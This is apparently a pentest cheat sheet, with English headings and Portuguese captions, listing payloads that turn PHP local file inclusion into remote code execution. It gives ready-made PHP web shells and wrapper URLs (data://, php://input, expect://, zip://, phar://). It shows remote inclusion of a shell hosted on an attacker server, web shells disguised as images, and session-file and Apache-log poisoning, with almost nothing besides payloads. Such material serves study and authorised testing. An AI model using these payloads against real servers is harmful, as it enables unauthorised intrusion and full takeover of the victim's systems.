Remote Code Execution
PHP Wrappers
/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id
RCE com wrapper de dados
curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id"
RCE com wrapper de entrada
curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id"
RCE com wrapper expect
RFI
echo '<?php system($_GET["cmd"]); ?>' > shell.php && python3 -m http.server <LISTENING_PORT>
Host web shell
/index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=id
Incluir shell web PHP remoto
LFI and File Uploads
echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif
Criar imagem maliciosa
/index.php?language=./profile_images/shell.gif&cmd=id
RCE com imagem maliciosa carregada
echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php
Crie um arquivo zip malicioso 'como jpg'
/index.php?language=zip://shell.zip%23shell.php&cmd=id
RCE com zip malicioso carregado
php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg
Crie um phar malicioso 'como jpg'
/index.php?language=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id
RCE com phar carregado malicioso
Log Poisoning
/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd
Ler parâmetros de sessão PHP
/index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E
Sessão de envenenamento PHP com shell web
/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id
RCE através de sessão PHP envenenada
curl -s "http://<SERVER_IP>:<PORT>/index.php" -A '<?php system($_GET["cmd"]); ?>'
Log do servidor Poison
/index.php?language=/var/log/apache2/access.log&cmd=id
RCE através de sessão PHP envenenada
Last updated